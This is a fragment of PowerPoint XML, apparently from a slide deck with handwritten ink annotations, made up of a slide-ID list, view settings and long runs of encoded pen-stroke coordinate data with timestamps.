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0" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="311" r:id="rId8"/>
    <p:sldId id="302" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="272" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="303" r:id="rId18"/>
    <p:sldId id="304" r:id="rId19"/>
    <p:sldId id="305" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="310" r:id="rId22"/>
    <p:sldId id="306" r:id="rId23"/>
    <p:sldId id="307" r:id="rId24"/>
    <p:sldId id="308" r:id="rId25"/>
    <p:sldId id="276" r:id="rId26"/>
    <p:sldId id="277" r:id="rId27"/>
    <p:sldId id="278" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
    <p:sldId id="281" r:id="rId31"/>
    <p:sldId id="282" r:id="rId32"/>
    <p:sldId id="312" r:id="rId33"/>
    <p:sldId id="283" r:id="rId34"/>
    <p:sldId id="284" r:id="rId35"/>
    <p:sldId id="285" r:id="rId36"/>
    <p:sldId id="286" r:id="rId37"/>
    <p:sldId id="287" r:id="rId38"/>
    <p:sldId id="288" r:id="rId39"/>
    <p:sldId id="290" r:id="rId40"/>
    <p:sldId id="265" r:id="rId41"/>
    <p:sldId id="291" r:id="rId42"/>
    <p:sldId id="292" r:id="rId43"/>
    <p:sldId id="293" r:id="rId44"/>
    <p:sldId id="294" r:id="rId45"/>
    <p:sldId id="297" r:id="rId46"/>
    <p:sldId id="295" r:id="rId47"/>
    <p:sldId id="301" r:id="rId48"/>
    <p:sldId id="309" r:id="rId49"/>
    <p:sldId id="299" r:id="rId50"/>
    <p:sldId id="296" r:id="rId51"/>
    <p:sldId id="266" r:id="rId52"/>
    <p:sldId id="267" r:id="rId53"/>
    <p:sldId id="268" r:id="rId54"/>
    <p:sldId id="300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23" autoAdjust="0"/>
    <p:restoredTop sz="79407" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="91" d="100"/>
          <a:sy n="91" d="100"/>
        </p:scale>
        <p:origin x="164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4:29:20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0 24575,'36'0'0,"34"0"0,11 0 0,-25 0 0,1 0 0,30 0 0,5 0 0,9 0 0,-9 0-1863,-9 0 1863,6 0 0,1 0 602,-2 0-602,-2 0 307,-8 0-307,-48 0 0,-33 0 0,-44 3 0,-21 1 0,-20 6 254,3 5 1,-9 5-255,0 7 0,3 4-1036,14 0 0,2 1 1036,13-8 0,-1 0 0,2 2 0,-18 14 0,5 0 0,8-3 0,3 0 0,-3 5 0,4-1 0,-18 15 0,39-22 399,27-15-399,20-12 2118,18-1-2118,13-6 0,46 0 0,9 0 0,-39 0 0,4 0 0,24 0 0,2 0 0,-19 0 0,1 0 0,21 0 0,-1 0 0,-26 0 0,-4 0 0,36 0 0,-41 0 0,-23 6 0,-28 13 0,-2-9 0,-29 14 0,-6 4 0,-24 18 0,1 2 0,16 1 0,-7 15 0,50-40 0,-5 24 0,82-48 0,-12 0 0,-11 0 0,0 0 0,15 0 0,-12 1 0,3-2 0,36-6 0,-37 7 0,-2-1 0,14-6 0,-28 7 0,-70 0 0,5 13 0,-61 6 0,6 26 0,35-22 0,-1-1 0,-43 26 0,28-9 0,3-1 0,-2-5 0,13-4 0,5-1 0,14-8 0,12 0 0,23-6 0,46-2 0,-1-19 0,29-2 0,3-7 0,-13 0 0,22 7 0,-4 2 0,-36 7 0,9 0 0,-44 0 0,-18 0 0,-15 12 0,-2-4 0,-9 12 0,6-2 0,10-4 0,10-1 0,15-7 0,32-6 0,-8 0 0,10 6 0,6-4 0,-11 4 0,19-6 0,-8 0 0,0 0 0,-7 0 0,-2 0 0,-13 0 0,-7 0 0,-9 0 0,-10-6 0,-3 5 0,-5-5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4:28:46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21 122 24575,'32'0'0,"-7"0"0,15 0 0,-19 0 0,5 0 0,-12 0 0,4 0 0,-5 0 0,-6-6 0,-1-8 0,-6-7 0,0-1 0,0 3 0,0 6 0,-11 5 0,2 3 0,-10 5 0,6 0 0,0-6 0,-12 4 0,10-3 0,-16 5 0,11 0 0,0 0 0,1 5 0,5 15 0,7 2 0,1 17 0,6-11 0,0 24 0,0-14 0,6 15 0,14-12 0,30 14 0,3-10 0,-13-11 0,1-1 0,5-1 0,-1 6 0,-20-31 0,-10-1 0,3-6 0,1 0 0,1 0 0,6-6 0,0-20 0,-5 1 0,-1-9 0,-6-17 0,-7 23 0,-1-37 0,-6 34 0,0-20 0,0 27 0,0-7 0,0 24 0,0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4:28:46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24575,'38'29'0,"2"4"0,2 10 0,-9-10 0,16 10 0,-1-17 0,-21-4 0,13-6 0,-27-3 0,6-8 0,-5-3 0,5 4 0,-7-6 0,-4 5 0,3-3 0,-10 9 0,5-9 0,-6 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4:28:47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0 24575,'0'40'0,"0"2"0,0 11 0,-8 29 0,6-44 0,-5 36 0,7-37 0,-7 17 0,5-6 0,-12 18 0,6-13 0,1-2 0,0-17 0,7 4 0,0-21 0,0 14 0,0-24 0,0-1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4:28:49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24575,'0'28'0,"0"7"0,0 15 0,0-1 0,0-6 0,0 11 0,0-28 0,0 22 0,0-7 0,0-11 0,0 27 0,0-26 0,0 8 0,0-14 0,0-11 0,0 10 0,0-9 0,0 3 0,0 1 0,0-5 0,6 5 0,1-12 0,6-1 0,0-6 0,0 5 0,17-3 0,-7 9 0,26-9 0,-19 3 0,8-5 0,-11 0 0,-1 0 0,-6 0 0,-2 0 0,7 0 0,-10 0 0,10-5 0,-12-3 0,-1 1 0,-4 1 0,-3 6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4:28:50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24575,'17'0'0,"-4"0"0,26 0 0,0 0 0,-8 0 0,2 0 0,-8 0 0,-11 0 0,17 0 0,-21 0 0,9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4:49:46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564 1 24575,'-29'6'0,"-6"2"0,-12 15 0,-9 1 0,-11 17 0,10-21 0,-21 38 0,15-30 0,-6 30 0,26-34 0,23 0 0,65-23 0,-19 5 0,28-5 0,6-2 0,6 1 0,2 0 0,4 0 0,-20 0 0,1 0 0,10-1 0,4 2 0,7 2 0,1 2 0,-10-1 0,-1 2 0,10 1 0,-5 2 0,11 6 0,-31 17 0,-50 0 0,-38 30 0,-18-7 0,-12 5 0,16-14 0,-2 2 0,0 0-874,-20 17 1,2 0 873,4-2 0,6-2 0,24-19 0,4-3 0,-32 30 0,4 1 0,30-31 0,70-25 0,9-10 0,5-7 0,7-4 873,18-7 1,1 0-874,-6 3 0,0 1 0,9-5 0,-3 2 0,-21 7 0,-6 2 0,25-3 0,-15 7 0,-19 0 0,-9 0 0,-45 13 0,1 3 0,-45 34 0,2 5 0,-7 20 0,17-3 0,24-14 0,15-19 0,24-7 0,6-17 0,12 5 0,20-5 0,-18-2 0,11 0 0,-23 0 0,-13 17 0,-7-13 0,-6 13 0,0-17 0,-6 0 0,5-6 0,-5-1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4:51:13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5:01:27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1060 1 24575,'-30'51'0,"0"0"0,5 0 0,0 2 0,-5 16 0,0 1 0,6-9 0,-1 1-457,-8 23 0,0 4 457,11-24 0,0 1 0,-1 1-1350,-3 2 0,0 2 1,0 1 1349,1 7 0,0 2 0,0-2 0,3-13 0,0-2 0,-2 10-103,0 6 0,-4 12 1,-1 5-1,2-3 0,2-10 103,2 1 0,3-8 0,-3 6 0,0-4 0,-4 8 0,0 2 0,2-6 0,5-12 0,1 8 0,2-12 0,-3-13 0,1-3 347,-7 35-347,-5-2 3125,17-42-3125,2-5 501,11-21 0,-5 2 0,6-12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5:01:30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99 24575,'13'0'0,"0"0"0,7 0 0,7 0 0,2 0 0,-2 0 0,-1 0 0,-6 0 0,8 0 0,-8 0 0,12 0 0,-3 0 0,6 0 0,-2 0 0,-11 0 0,4 0 0,-6 0 0,19 0 0,-10 0 0,9 0 0,-12 0 0,0-6 0,-6 5 0,-2-5 0,1-6 0,1 9 0,6-14 0,-1 4 0,-5 4 0,5-8 0,-17 10 0,9-1 0,-15 14 0,3 3 0,-5 9 0,-11 1 0,8-5 0,-14 5 0,9-6 0,-11 24 0,10-11 0,-9 20 0,11 0 0,-7-14 0,0 33 0,6-21 0,2 11 0,6 18 0,0-26 0,0 24 0,0-41 0,0 6 0,0-10 0,0-5 0,0 4 0,0-12 0,0-6 0,0-1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5:01:40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24575,'0'19'0,"0"-4"0,0 31 0,0-26 0,0 51 0,0-43 0,0 32 0,0-18 0,0-3 0,0 18 0,0-13 0,0 24 0,0-7 0,0 4 0,0-5 0,0-17 0,0 2 0,0-22 0,0-5 0,0-12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4:31:13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24575,'44'0'0,"5"0"0,16 0 0,17 0 0,4 0 0,4 0 0,-23 0 0,10 0 0,-8 0 0,-15 0 0,-3 0 0,13 0 0,-1 0 0,25 0 0,-32 0 0,-8 0 0,-24 0 0,-18 0 0,-34 7 0,-12 1 0,-50 30 0,35-10 0,8-9 0,0 1 0,-18 11 0,9-7 0,1 7 0,10-8 0,0 6 0,1-1 0,1 2 0,13 3 0,11-6 0,13-2 0,6-5 0,0-1 0,0-1 0,0-3 0,6-2 0,7-1 0,9-11 0,13 12 0,3-11 0,7 11 0,49-4 0,-7-1 0,-27-3 0,1-3 0,23-2 0,-8 7 0,-44 0 0,-2 6 0,-30 6 0,-28 29 0,1-13 0,-13 4 0,-4 1 0,-11 4 0,13-16 0,-1 1 0,-28 31 0,12-24 0,-13 21 0,22-4 0,25-25 0,23 7 0,32-35 0,16 0 0,46 0 0,-26 0 0,-13 0 0,7 0 0,26 0 0,1 0 0,-31 0 0,1 0 0,35 0 0,-7 0 0,-24 0 0,-20 0 0,-28 6 0,-7 7 0,-32 8 0,-41 33 0,25-25 0,-1 0 0,-4 6 0,1 1 0,-15 17 0,9 12 0,21-30 0,2 8 0,2 2 0,2-3 0,-9 25 0,27-33 0,1-7 0,6-8 0,18-6 0,7-6 0,26 7 0,-3-12 0,43 5 0,-27-7 0,29 0 0,2 0 0,-11 0 0,-33 0 0,-1 0 0,23-7 0,-23 0 0,-11-6 0,-25 5 0,-2 3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5:01:41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24575,'56'0'0,"-21"0"0,28 0 0,0 0 0,-20 0 0,11 0 0,-34 0 0,-8 0 0,1 0 0,0 0 0,0 0 0,12 0 0,4 0 0,18-12 0,32-4 0,-41 0 0,17 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5:01:43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24575,'33'0'0,"-15"0"0,30 0 0,-5 0 0,-9 0 0,20 0 0,-38 0 0,31 0 0,-24 0 0,17 0 0,-19 0 0,4 0 0,6 0 0,-8 0 0,14 0 0,-16 0 0,29 0 0,-23 0 0,8 6 0,-29 1 0,-6 18 0,0 6 0,0 4 0,0 29 0,0-22 0,0 24 0,0-1 0,0 18 0,0-10 0,0 3 0,0-39 0,0-3 0,0-13 0,0 11 0,0-4 0,0 7 0,0-3 0,0-6 0,0-1 0,0-5 0,0-1 0,0-6 0,0-6 0,0-1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4:29:38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4:39:15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14:55:08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24575,'56'0'0,"1"0"0,34 0 0,-10 0 0,11 0-1963,-18 0 0,4 0 1,-3 0 1962,18 0 0,1 0 0,-11 0 0,4 0 0,-5 0 0,10 0 0,-5 0 803,-6 0 0,6 0-803,-15 0 0,8 0 0,2 0 0,-3 0 0,11 0 0,-1 0 0,4 0-155,-2 0 0,5 0 0,2 0 0,-4 0 155,-10 0 0,-2 0 0,-1 0 0,-1 0 0,18 0 0,-1 0 0,0 0-270,-1 0 1,0-1-1,-2 2 270,-11 3 0,-1 2 0,1 1 868,10 1 1,2 2 0,-1 0-869,-8 0 0,-2 0 0,-3 0 0,-10 0 0,-2-1 0,-4-2 56,9-2 0,-5-2-56,-15-3 0,-6 0 0,10 7 1795,36-6-1795,-34 6 0,-2 0 0,14-6 0,-11 2 0,-2 1 0,-5 3 1055,20-6-1055,16 13 71,-26-9 1,3-1-72,4 4 0,0 0 0,-16-4 0,3 1 0,36 9 0,1 1 0,-38-9 0,1 0 0,23 8 0,11 3 0,-10-2 0,-17-5 0,-3 0 0,37 6 0,-6-1 0,-11-5 0,-25-7 0,0 1 0,24 2 0,3-4 0,-27 5 0,-23-7 0,-16 0 0,2 0 0,9 0 0,1 0 0,25-7 0,-14 6 0,9-12 0,-14 12 0,4-12 0,-16 12 0,8-11 0,-13 10 0,1-9 0,6 9 0,-1-4 0,1 6 0,0-5 0,0 3 0,12-16 0,-15 15 0,20-15 0,-27 17 0,40-17 0,-30 9 0,25-5 0,-31 8 0,-2 6 0,-5-6 0,0 5 0,0-5 0,0 6 0,0 0 0,0 0 0,-1 0 0,1 0 0,-6 0 0,-1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14:56:32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1 321 24575,'27'0'0,"43"0"0,9 0 0,-4 0 0,18 0 0,7 0 0,-32 0 0,-2 0 0,9-4 0,2 0-1288,9-1 0,-2 0 1288,-19 0 0,-2 0 410,4-3 1,1 0-411,0 3 0,-1 0 0,1-3 0,-1-1 212,-4 4 0,-1 0-212,-8-3 0,-3 1 0,31 6 0,11-14 0,1 6 0,-22 0 0,-12-2 0,2 0 0,-12 6 0,1 0 0,41-15 0,4 1 0,-18 12 0,-2 1 154,7-9 1,-4 1-155,-21 12 0,-3 2 0,44-7-562,-16 7 562,-30 0 0,0 0 0,24 0 0,-22 0 0,5 0 0,17 0 0,0 0 0,-22 0 0,3 0 0,26-4 0,12-2 0,-15 1 0,7 1 0,-6-2 0,18-3 0,-13 1 0,-24 4 0,-3-1 0,33 0 0,3 1 0,-17 0 0,-6 1 0,-18 2 0,3 2 496,34-1 0,5 0-496,-15 0 0,0 0 0,9 0 0,-2 0 296,-15 0 0,-4 0-296,-14 0 0,1 0 0,18 0 0,2 0 0,-7 0 0,3 0 0,-4 0 0,5 0 0,-9 0 0,26 0 0,-28-1 0,-3 2 0,8 5 0,-15-2 0,2 1 0,35 10 0,-34-7 0,-3-1 0,13 8 0,-3-1 0,-7 0 0,0 6 0,0-5 0,-1 5 0,1-6 0,-7 0 0,-7-6 0,-8 4 0,-1-4 0,2-1 0,6 5 0,0-4 0,5-1 0,-10 5 0,-4-11 0,-7 5 0,7 0 0,-3-4 0,15 4 0,-23-6 0,9 0 0,-15 0 0,-3 5 0,0-3 0,-5 4 0,6-6 0,0 0 0,0 0 0,0 0 0,-6 0 0,-2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14:57:15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1 428 24575,'35'0'0,"6"0"0,34 0 0,9-16 0,5 12 0,-38-7 0,2-3 0,18 0 0,0 1 0,-19 6 0,1 0 0,29-10 0,2 0 0,-25 9 0,1-1 0,4-3 0,6-3 0,-1 0 0,-3 0 0,1 0 0,-2 0 0,29-2 0,-3-1 0,-17-1 0,-6 2 0,31 7 0,-40-5 0,3-1 0,7 7 0,1 0 0,-3-4 0,-2 2 0,-6 6 0,2 1 0,4-2 0,6 1 0,-5 1 0,3 3 0,1 0 0,1-3 0,6-2 0,-6 2 0,2 3 0,-4 0 0,2-3 0,-3 1 0,24 3 0,-1 0 0,-6 0 0,-4 0 0,6 0 0,-10 0 0,2 0 0,-8 0 0,4-1 0,-2 2 0,17 2 0,-4 1-591,-16-4 1,-2 2 590,1 4 0,-1 3 0,-1-1 0,2 1 0,22 1 0,4 0 0,-3 2 0,2 1 0,-22-7 0,1 0 0,-8-1 0,-7-1 0,-3 1 0,18 2 0,-2 0 0,15 1 0,-28-4 0,3 1 0,2 2 0,-3-1 0,19-4 0,-12 4 0,-4 1 0,-17 1 1181,42 0-1181,-42-2 0,10 0 0,-8-4 0,-7 10 0,-1-11 0,34 5 0,-11 0 0,28 3 0,-35-3 0,-2 2 0,16 7 0,-2-7 0,-2-1 0,-6 2 0,19-3 0,-45-6 0,-15 0 0,0 0 0,-5 0 0,12 0 0,-12 0 0,11 0 0,-5 0 0,0 0 0,5 0 0,-5 0 0,6-6 0,6 5 0,-5-5 0,0 0 0,-8 5 0,-1-5 0,-3 6 0,9 0 0,-10 0 0,5 0 0,-6 0 0,-1 0 0,1-6 0,0 5 0,0-5 0,6 6 0,-5 0 0,5 0 0,-7 0 0,-4-6 0,3 5 0,-4-5 0,12 6 0,-11-6 0,9 5 0,-9-5 0,4 6 0,-4-6 0,3 5 0,-4-5 0,6 6 0,0 0 0,0 0 0,0 0 0,-6 0 0,-1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15:00:44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2108 454 24575,'-21'0'0,"-11"-13"0,9 10 0,-4-14 0,0 15 0,13-9 0,-6 9 0,0-10 0,-7 11 0,-3-12 0,-3 11 0,11-4 0,-28 0 0,17 4 0,-27-10 0,-20-2 0,22 5 0,-31-9 0,33 4 0,0-2 0,-12-11 0,8 5 0,-8 0 0,12-4 0,-8 3 0,-2-6 0,-15 6 0,5-4 0,8 10 0,-23-5 0,45 8 0,-22 5 0,15-3 0,6 10 0,-21-4 0,24 6 0,3 0 0,7 0 0,5 6 0,-5 2 0,0 18 0,5 3 0,-5 18 0,7 2 0,4 15 0,9 1 0,7-4 0,7 38 0,0-11 0,0 11 0,0-15 0,0-28 0,0-7 0,0-2 0,0-13 0,0 6 0,0-13 0,12 11 0,-4-16 0,11 2 0,6-11 0,10 1 0,50 7 0,-25-5 0,0-5 0,3 0 0,20 4 0,-26-9 0,5-3 0,20 1 0,-2-1 0,6-3 0,-10 0 0,-8 0 0,-33 0 0,29 0 0,-35 0 0,60-6 0,-16-2 0,16-6 0,-16 6 0,-30-5 0,13 5 0,0 1 0,7-6 0,-17 5 0,42-13 0,-50 12 0,50-17 0,-43 10 0,19-6 0,-8-5 0,-7 5 0,-2-5 0,-5-7 0,-1-1 0,1-8 0,0-17 0,-7 13 0,-7-13 0,-15 26 0,-7 7 0,-6 8 0,0-6 0,0 9 0,-5-3 0,-3 14 0,-5-1 0,0 4 0,0-3 0,6 5 0,1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15:02:18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 24575,'13'0'0,"0"0"0,6 0 0,3 0 0,11 0 0,-10 5 0,2 3 0,0 11 0,4 1 0,18 8 0,3-1 0,6 1 0,9 0 0,-7 0 0,-1 0 0,-22-7 0,2-1 0,-15-7 0,5 0 0,-9 0 0,-5-6 0,-6 5 0,-7-11 0,-7 10 0,-6-9 0,0 4 0,-12 5 0,4-2 0,-12 3 0,12 0 0,-17-4 0,20 5 0,-21 0 0,5 1 0,-3 6 0,-11 1 0,1 0 0,4 4 0,-12-3 0,11-1 0,-30 18 0,19-14 0,-13 14 0,20-17 0,14-3 0,7-6 0,2-5 0,16 3 0,-8-10 0,16 11 0,-5-11 0,6 5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15:02:23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1826 76 24575,'-20'0'0,"-2"0"0,-5 0 0,-1 0 0,8 0 0,0 0 0,7 0 0,0 0 0,-6 0 0,-9 0 0,6 0 0,-11 0 0,4 0 0,-1 0 0,1 0 0,-17 0 0,11 0 0,-22 0 0,19 0 0,-55-8 0,3 0 0,28 0 0,-1 0 0,10 4 0,3 0 0,-24-9 0,3 11 0,5-4 0,13 6 0,5 0 0,1-6 0,15 4 0,-33-4 0,33 6 0,-20 0 0,30 0 0,-9 0 0,11 0 0,-6 0 0,0 11 0,6-2 0,-5 22 0,4-3 0,-6 13 0,-1 12 0,7-2 0,1 4 0,6-6 0,-1 0 0,6 8 0,2-4 0,1 2 0,5 25 0,-2-25 0,0-4 0,3-1 0,0-17 0,11-1 0,4-3 0,12 11 0,6 1 0,2 0 0,20 1 0,-4-2 0,2 0 0,11 6 0,-12-11 0,-3-2 0,-12-6 0,8-10 0,29 18 0,-21-16 0,21 10 0,-17-13 0,0-3 0,26-2 0,-17 1 0,0-3 0,15-9 0,0 0 0,-6 0 0,18-13 0,-29 3 0,11-17 0,-37 11 0,3-5 0,-1 7 0,3-6 0,21-3 0,14-12 0,-10 11 0,1-9 0,-16 1 0,-24 8 0,13-18 0,-32 20 0,13-11 0,-21-8 0,10-38 0,-10 6 0,2 22 0,-1 1 0,-3-24 0,0-4 0,0 30 0,-13-16 0,-9-5 0,-2 17 0,-3-21 0,13 45 0,-24-18 0,12 14 0,-18-7 0,18 20 0,5 12 0,3 1 0,10 6 0,3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4:32:03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24575,'35'0'0,"-1"0"0,14 0 0,-8 0 0,10 0 0,-6 0 0,6 0 0,-10 0 0,8 0 0,-26 0 0,-3 0 0,-12 6 0,-1 7 0,-6 20 0,-7 5 0,-1 12 0,-24 18 0,-7 3 0,-6 11 0,-11-2 0,23-30 0,-9-2 0,20-20 0,2-7 0,-10 10 0,18-15 0,-17 2 0,33-12 0,17-6 0,3 0 0,24 0 0,-10 0 0,44 0 0,2 0 0,-21 0 0,1 0 0,28 0 0,2 0 0,-18 0 0,-4-7 0,-13 5 0,-12-4 0,-27 6 0,-7 5 0,-7 2 0,-13 26 0,-7-8 0,-10 33 0,-28 3 0,19-12 0,-3 2 0,-4-2 0,-2 1 0,-3 7 0,0-1 0,-17 21 0,4-17 0,29-21 0,9-18 0,26-9 0,18-6 0,33-6 0,14 0 0,-1 0 0,-4 0 0,-9 0 0,-3 0 0,-2 0 0,-12 0 0,-19 0 0,-2 6 0,-12 1 0,-1 6 0,-6 0 0,0 0 0,-13 6 0,-24 23 0,3-9 0,-23 18 0,6-2 0,3 5 0,-3-6 0,22-8 0,9-15 0,13-9 0,1 10 0,6-13 0,0-1 0,12 1 0,-4-6 0,23-1 0,-8-6 0,10 0 0,15 0 0,-7 0 0,9 0 0,14 0 0,-30 0 0,22 0 0,-28 0 0,6 0 0,-6 0 0,4 0 0,-6 0 0,0 0 0,-6 0 0,-7 6 0,-7-5 0,-6 5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14:55:18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364 126 24575,'-19'0'0,"4"0"0,-11 0 0,4 0 0,-6 0 0,7 0 0,-11 0 0,16 0 0,-17 0 0,19 0 0,-12 6 0,12-5 0,-5 10 0,6-3 0,-12 16 0,15-8 0,-13 8 0,22-11 0,-5 0 0,6 0 0,0-1 0,0 1 0,5 0 0,3-6 0,4-1 0,1-6 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-6 0,-6-1 0,-1-6 0,-6-7 0,6 11 0,-5-9 0,5 11 0,-6-6 0,0-7 0,0 5 0,0-4 0,0 6 0,0 0 0,0 0 0,0-6 0,0 4 0,0-3 0,0-1 0,0 4 0,0-4 0,0 6 0,0 12 0,5 2 0,3 19 0,5 7 0,1 2 0,-1-2 0,0 5 0,1-9 0,-7 4 0,5-2 0,-11-11 0,11 5 0,-11-6 0,5 0 0,0-1 0,-5 1 0,10-6 0,-9 5 0,9-11 0,-4 5 0,6 0 0,-6-5 0,-1 5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14:55:20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0 135 24575,'0'-22'0,"0"3"0,6 11 0,1-3 0,6 9 0,6-9 0,-5 9 0,5-4 0,-1 1 0,9-3 0,7-6 0,6 7 0,-6-6 0,-3 12 0,-11-5 0,-1 6 0,-6 0 0,-6 0 0,-2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14:55:22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0 24575,'-27'0'0,"6"0"0,2 0 0,6 0 0,0 0 0,0 0 0,5 6 0,-4 8 0,11 6 0,-5 8 0,6-1 0,-7 13 0,6 3 0,-6 1 0,7-11 0,0-7 0,0-1 0,6-9 0,14 1 0,8-17 0,20 0 0,-6 0 0,12 0 0,-11 0 0,-3 0 0,-7 0 0,-7 0 0,-1 0 0,-5 0 0,-7-6 0,-7-1 0,-6 6 0,0 9 0,0 13 0,0 36 0,7-14 0,1 32 0,15 9 0,-10-34 0,-1 1 0,1 0 0,-1-1 0,4 35 0,-2-19 0,-6-19 0,0-5 0,4-5 0,-10-21 0,-2 3 0,-8-14 0,-11-5 0,-15 0 0,9-12 0,-14 2 0,5-29 0,2 21 0,-2-21 0,14 23 0,13-27 0,1 11 0,6-8 0,0 8 0,18-20 0,5 4 0,18-14 0,0 22 0,-7 13 0,-1 7 0,-8-5 0,1 11 0,7-12 0,3 4 0,21-27 0,-7 5 0,14-20 0,2-1 0,-4 9 0,-8 2 0,-7 9 0,-28 31 0,-13 9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14:55:24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526 0 24575,'-20'0'0,"6"0"0,-33 0 0,21 0 0,-28 0 0,24 0 0,-4 0 0,13 0 0,-5 0 0,11 0 0,-25 0 0,22 0 0,-28 0 0,30 0 0,-9 0 0,6 0 0,4 0 0,-4 0 0,0 12 0,10-3 0,-4 10 0,13-6 0,0 0 0,0 0 0,0 0 0,0 5 0,0 2 0,0 0 0,0-1 0,0 6 0,7 10 0,0 8 0,18 14 0,-10-20 0,15 0 0,-21-18 0,8-6 0,-10-6 0,6 4 0,0-3 0,6 4 0,1 1 0,0-6 0,4-1 0,-10-6 0,11 0 0,-5 0 0,12 0 0,2 0 0,-6 0 0,-2 0 0,-13 0 0,6-6 0,1 4 0,1-10 0,-2 11 0,0-5 0,-5 6 0,10-6 0,2 5 0,-5-5 0,4 6 0,-18 0 0,-2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14:55:26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1 368 24575,'64'0'0,"14"0"0,-11 0 0,4 0-1799,0 0 0,2 0 1799,15 0 0,3 0 0,3 1 0,5-2 0,-19-5 0,3-1 0,-1 1 0,-5 4 0,-2 2 0,-2-2 0,21-7 0,1-1 0,-20 6 0,4 2 0,-7-1 373,-2-2 0,1-1-373,6-2 0,7-2 0,-2 2 0,-13 4 0,-2 1 0,0-2 0,6-5 0,2-3 0,-2 3 0,27 4 0,-2 0 336,-10-3 1,3-1-337,-1 1 0,8-1 0,-13 3 0,-25 5 0,4 0 0,21-3 0,21-2 0,0-1 0,-16 2 0,-11 1 0,-2 0 0,18-1 0,9 0 0,-9-1 0,-16-1 0,-4-1 0,16 0 0,-3 0 0,-23-3 0,-1 1 0,19 1 0,1 1 928,-19 1 0,3 0-928,25-1 0,3 3 0,-15 5 0,-1 0 0,16-3 0,-2 0 161,-22 4 1,-2 0-162,0 0 0,-1 0 0,-4 0 0,-1 0 0,2 0 0,-2 0 0,-3 0 0,-1 0 0,0 3 0,-1 1 0,-4 3 0,0 2 0,-3 2 0,-3 1 0,23 5 0,-17 3 0,-9-19 0,-14 6 0,13-7 0,5 0 0,-5 0 0,23 0 0,-5 0 0,3 0 0,7 0 0,-8 0 0,-1 0 0,-8 0 0,-13 0 0,-3 0 0,1 0 0,15 0 0,10 0 0,4 0 0,-13 0 0,-9 0 0,-14 0 0,-2 0 0,-18 0 0,-2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14:55:30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261 129 24575,'-21'0'0,"-6"0"0,12 0 0,-11 0 0,5 0 0,-13 0 0,4 0 0,3 0 0,2 0 0,10 6 0,2 7 0,7 53 0,6-20 0,0 13 0,0 2 0,7-7 0,5 3 0,7 0 0,30 17 0,-11 8 0,9-23 0,-37-23 0,26 2 0,-18-20 0,12 5 0,-17-23 0,0 0 0,5 0 0,-3-6 0,3-1 0,-4-19 0,-1-21 0,-5 7 0,2-9 0,-1-4 0,-5-23 0,6 16 0,0-2 0,-1-32 0,0 6 0,-3 42 0,-6 8 0,6 31 0,1 1 0,20 46 0,7 1 0,6 36 0,-5-25 0,3 3 0,-3-3 0,2 3 0,15 18 0,0 0 0,-15-23 0,-3-4 0,-1 1 0,-3-7 0,-1-9 0,12 15 0,-11-34 0,3 13 0,-14-56 0,-12-2 0,-1-16 0,-6 1 0,0-35 0,0 21 0,0-27 0,0 41 0,0 1 0,0 17 0,0-13 0,0 21 0,0-4 0,0 8 0,17-1 0,20 3 0,29-4 0,25 12 0,-6 1 0,-3 7 0,-25 0 0,-16 0 0,-2-6 0,-11-1 0,18-13 0,-21 5 0,25-17 0,-27 10 0,9-10 0,-39 17 0,-5 3 0,-31 12 0,-8 0 0,3 0 0,-2 0 0,14 0 0,2 0 0,5 0 0,8 6 0,10 7 0,11 1 0,5 11 0,3-11 0,11 11 0,2-10 0,20 12 0,-10-12 0,9-1 0,-6-8 0,-6-6 0,4 0 0,-12 0 0,-1-6 0,-6 11 0,0-4 0,6 24 0,-4 6 0,11 4 0,-9 9 0,22 18 0,-14-6 0,10 13 0,-21-28 0,-8-8 0,-6-8 0,0-5 0,0-1 0,0-6 0,-6-6 0,-1-1 0,-6-6 0,0 0 0,0 0 0,0 0 0,6-6 0,1-8 0,0-26 0,5 8 0,-5-31 0,6-8 0,0 1 0,7-9 0,25-14 0,10 9 0,-14 31 0,0 1 0,17-23 0,-11 37 0,-19 20 0,-4 18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14:55:31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0 296 24575,'14'21'0,"-7"-1"0,5-1 0,-5-4 0,7 10 0,-1-10 0,-6 3 0,4-11 0,-9 5 0,9-11 0,-4 11 0,6-5 0,0 0 0,0-1 0,-6-1 0,4-3 0,-3 3 0,4-5 0,1 0 0,-6 6 0,5-4 0,-11 9 0,11-10 0,-5 5 0,0-12 0,5-7 0,-10-2 0,4-24 0,-6 14 0,6-15 0,-4-1 0,10 10 0,-11-3 0,12 2 0,-12 9 0,11-4 0,-5-17 0,6 24 0,-5-29 0,3 39 0,-10-14 0,5 17 0,-6-6 0,0 0 0,0 6 0,0 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14:55:33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0 271 24575,'75'0'0,"-4"0"0,6 0 0,-2 0 0,3 0-1736,-8 0 1,5 0 0,-2 0 1735,23 0 0,4 0 0,-8 0 0,6 0 0,-6 0 0,-22 0 0,-4 0 0,2 0 0,19 0 0,3 0 0,-1 0 0,-7 0 0,-2 0 0,-4 0 0,9 0 0,1 0 0,-12 0 0,5 0 0,3 0 0,16 0 0,5 0 0,-5 0 0,-20 0 0,-4 0 0,4 0 0,0 0 0,4 0 0,0 0 0,-4 0 0,2 0 0,-4 0 0,-3 0 508,22 0 1,0 0-509,-19 0 0,2 0 0,0 0 0,-4 0 0,0 0 0,2 0 319,6 0 1,3 0 0,0 0-320,8 0 0,1 0 0,-5 0 0,-17 0 0,-4 0 0,1 0 0,1 0 0,0 0 0,-6 0 0,-6 0 0,-4 0 0,6 0 0,-1 0 1362,-8 0 1,-1 0-1363,4 0 0,0 0 252,1-4 1,0 0-253,0 4 0,2-1 0,37-7 0,-1 1 0,5 5 0,-15-2 0,4 0 0,-15 4 0,-6 0 0,15 0 0,-13 0 0,-8 0 0,-29 0 0,18-6 0,-10 4 0,2-4 0,-1 0 0,-1-3 0,-4 1 0,36-5 0,-40 12 0,42-12 0,-36 11 0,1-5 